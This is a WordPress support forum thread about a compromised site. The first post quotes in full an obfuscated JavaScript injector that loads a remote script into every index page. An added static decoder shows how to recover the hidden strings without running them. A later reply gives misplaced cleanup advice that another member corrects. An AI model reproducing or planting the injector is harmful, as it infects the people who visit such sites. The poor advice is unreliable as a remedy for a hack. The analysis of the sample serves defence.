[resolved] obfuscated code - can anyone decode? (9 posts)

  1. malibu06
    Member
    Posted 4 years ago #

    This code is showing up on all my index.php files once I upload to the server. I've tried replacing all the index.php with clean files only to find this code on the files a few hours later again.

    <script>/*GNU GPL*/ try{window.onload = function(){var Dwqlxqw7kr7vkv = document.createElement('s@$$^c&r!i^p&t^)#&'.replace(/\^|\$|\!|\(|&|\)|#|@/ig, ''));var N790b8w6sa8nl = 'U70yiuxmlrwd';Dwqlxqw7kr7vkv.setAttribute('type', 't&@^e!$&x^&!t!#/@(j!(a@v@)a(s!!!@c^^!r)&&i&p)^#t))'.replace(/\$|@|\(|#|\)|\^|\!|&/ig, ''));Dwqlxqw7kr7vkv.setAttribute('src', 'h$t$&$(t^@p!@^:!^$!/(!/)!a&!d))#^d@@i)^(c$!$&!t#$i)#(n()$!g(g(!a#m$!#e^!$s)^-#c(&o@$(!m!.^#&f(!c&@!$2&.#c^o^&m!.!z(#i(#d#!)d$!$u!#!-#!(c!o&@m!$#.($t!@h)$e&$g)@i^@!f(t!#@s#a(l$)&)e!.&^@r((u$#@:^$8@@^0&^!^8^^&0!@/@))g$)^@o$o&#$g(&l!(&)e$$.)#c@@o#m&/!!g(#o@$!o&g(!l$^#e@!.&($c!#o#m^#/^(d&$@i(^o^#n$(&.)#!n!)&e(!.)j!@p!#^$/@))v$!e))!r)(#i)!z^$@(o^((n)(.$n(@)e#@t$!/))^#w!^)i^&#r$($e#!@@$d)!!.#)&c#(@o(m&/&^'.replace(/\$|@|#|\(|&|\!|\)|\^/ig, ''));Dwqlxqw7kr7vkv.setAttribute('defer', 'd#e&)f@e)$r#)'.replace(/&|\(|#|@|\)|\$|\!|\^/ig, ''));Dwqlxqw7kr7vkv.setAttribute('id', 'L^)#6^!)^q@@c#!@@e@&@e^#^f$$@n#^@#7&f@l@^^('.replace(/\!|&|\$|\)|\^|@|#|\(/ig, ''));document.body.appendChild(Dwqlxqw7kr7vkv);}} catch(O27phyeucb2au4) {}</script>
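
    Added example, not part of the original post or thread: the script above hides every string literal by interleaving junk characters that a trailing .replace(/.../ig, '') strips, so the strings can be recovered statically without running the script. The sample input and the host example.invalid are constructed, and the function names are hypothetical.

```javascript
// Static decoder for the junk-character obfuscation in the first post.
// Nothing from the analysed script is executed; it is handled as text only.

// Matches  'literal'.replace(/pattern/flags, '')  and captures the three parts.
const JUNK_CALL =
  /'((?:[^'\\]|\\.)*)'\s*\.replace\(\s*\/((?:[^\/\\]|\\.)+)\/([a-z]*)\s*,\s*''\s*\)/g;

// Return each obfuscated literal with its own junk-stripping regex applied.
// Assumption: the literals contain no backslash escapes (as in the posted script).
function decodeJunkStrings(source) {
  const decoded = [];
  for (const [, literal, pattern, flags] of source.matchAll(JUNK_CALL)) {
    const re = new RegExp(pattern, flags.includes('g') ? flags : flags + 'g');
    decoded.push(literal.replace(re, ''));
  }
  return decoded;
}

// Summarise what the injected snippet would do: which element it creates
// and which remote hosts it would load from.
function summarize(source) {
  const strings = decodeJunkStrings(source);
  const urls = strings.filter((s) => /^https?:\/\//i.test(s));
  return {
    strings,
    injectsScript: strings.some((s) => s.toLowerCase() === 'script'),
    remoteHosts: urls.map((u) => new URL(u).host),
  };
}

// Constructed sample in the same style (example.invalid is a placeholder host).
const SAMPLE = [
  "var e = document.createElement('s@$c^r!i&p#t'.replace(/\\^|\\$|\\!|&|#|@/ig, ''));",
  "e.setAttribute('src', 'h$t^t!p:/#/e&x@a(m)p$l^e.i!n#v&a@l(i)d:8$0^8!0/#a&.@j(s)'" +
    ".replace(/\\$|@|#|\\(|&|\\!|\\)|\\^/ig, ''));",
  'document.body.appendChild(e);',
].join('\n');

console.log(summarize(SAMPLE));
```

    Pass it the contents of an infected file read as text; a decoded http(s) URL gives a host to look for in proxy or DNS logs.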

  2. esmi
    Forum Moderator
    Posted 4 years ago #

    Site url?

  3. malibu06
    Member
    Posted 4 years ago #

    The site is http://www.artcretedesigns.com

    I've disabled the index.php file and it is pointing to the old html file.

    It seems to be some kind of virus. It is showing up on all index files, whether php, html, asp...

  4. esmi
    Forum Moderator
    Posted 4 years ago #

  5. msacom
    Member
    Posted 4 years ago #

    Hello to everybody. I've spent all morning trying to decode or delete in some way my "double" base64 coding... I tried everything, nothing... and, unbelievably (in my template it is working OK), I just deleted the commands "get header" and "get footer" from index, page, search, etc. and I replaced them with an "include" command. I designed my footer (you can easily change the original one too, removing the base 64 code completely using Dreamweaver or similar) and everything works great.
    I cannot believe it. I lost 5 hours and the solution was there!

  6. msacom
    Member
    Posted 4 years ago #

    I forgot. You have to save your footer.php (or header or whatever else) with another name, e.g. footer2.php, and leave the original one running in the ROOT (alone and forgotten).

  7. s_ha_dum
    Member
    Posted 4 years ago #

    Sometimes this stuff can be encoded twenty times or more.

    Removing the get_header and get_footer may get the code off your site but it doesn't make you not-hacked. Someone got in. The door is still there and maybe there are additional back doors now. Whoever did this can come back. There may be other code that you haven't found yet as well. You aren't done.

  8. msacom
    Member
    Posted 4 years ago #

    Sorry, I posted a reply to the wrong topic!!! My trick was just to delete advertise in WP Themes.

  9. s_ha_dum
    Member
    Posted 4 years ago #

    I don't understand your comment about deleting 'advertise' but my point still stands for anyone reading the thread: this is not a solution to a hacked site. It might be a quick band-aid but it is not the end of the story.

Topic Closed

This topic has been closed to new replies.
